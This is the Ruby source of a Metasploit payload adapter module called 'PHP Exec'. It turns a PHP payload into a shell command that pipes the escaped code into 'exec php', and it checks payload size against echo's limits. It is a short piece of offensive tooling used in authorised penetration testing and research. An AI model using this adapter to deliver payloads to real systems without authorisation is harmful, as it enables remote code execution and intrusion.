1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
module MetasploitModule
7
  include Msf::Payload::Adapter
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'PHP Exec',
14
        'Description' => 'Execute a PHP payload as an OS command from a Posix-compatible shell',
15
        'Author' => ['Spencer McIntyre', 'msutovsky-r7'],
16
        'Platform' => 'unix',
17
        'Arch' => ARCH_CMD,
18
        'License' => MSF_LICENSE,
19
        'AdaptedArch' => ARCH_PHP,
20
        'AdaptedPlatform' => 'php'
21
      )
22
    )
23
  end
24

25
  def compatible?(mod)
26
    if mod.type == Msf::MODULE_PAYLOAD && mod.class.const_defined?(:CachedSize) && mod.class::CachedSize != :dynamic && (mod.class::CachedSize >= 120_000) # echo does not have an unlimited amount of space
27
      return false
28
    end
29

30
    super
31
  end
32

33
  def generate(_opts = {})
34
    payload = super
35

36
    escaped_exec_stub = Shellwords.escape(Msf::Payload::Php.create_exec_stub(payload))
37

38
    if payload.include?("\n")
39
      escaped_payload = escaped_exec_stub
40
    else
41
      # pick the shorter one
42
      escaped_payload = [Shellwords.escape(payload), escaped_exec_stub].min_by(&:length)
43
    end
44

45
    "echo #{escaped_payload}|exec php"
46
  end
47

48
  def include_send_uuid
49
    true
50
  end
51
end
52

53